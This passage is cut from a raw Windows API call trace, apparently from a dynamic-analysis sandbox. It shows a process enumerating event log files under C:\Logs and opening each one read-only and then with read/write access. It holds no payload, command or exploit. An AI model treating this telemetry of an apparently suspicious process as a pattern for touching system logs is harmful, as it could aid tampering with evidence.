Size=0x68) returned 0x463c8 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0071.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.767] AreFileApisANSI () returned 1 [0071.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0071.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.767] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.767] AreFileApisANSI () returned 1 [0071.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.767] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69e30 [0071.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0071.767] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.767] GetFileType (hFile=0x428) returned 0x1 [0071.767] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0071.767] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.768] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.768] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.768] CloseHandle (hObject=0x428) returned 1 [0071.768] AreFileApisANSI () returned 1 [0071.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.768] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0071.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0071.768] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.768] GetFileType (hFile=0x428) returned 0x1 [0071.768] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.768] CloseHandle (hObject=0x428) returned 1 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.769] AreFileApisANSI () returned 1 [0071.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 58 [0071.769] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0071.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.769] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.770] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0071.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.771] AreFileApisANSI () returned 1 [0071.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0071.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0071.771] AreFileApisANSI () returned 1 [0071.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0071.771] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.772] GetFileType (hFile=0x428) returned 0x1 [0071.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.772] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.772] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.772] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.772] CloseHandle (hObject=0x428) returned 1 [0071.773] AreFileApisANSI () returned 1 [0071.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0071.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0071.773] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.773] GetFileType (hFile=0x428) returned 0x1 [0071.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0071.774] CloseHandle (hObject=0x428) returned 1 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.774] AreFileApisANSI () returned 1 [0071.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0071.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0071.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0071.774] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0071.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.775] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x80a30 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30c98 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x51398 [0071.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x30fc0 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0071.775] HeapFree 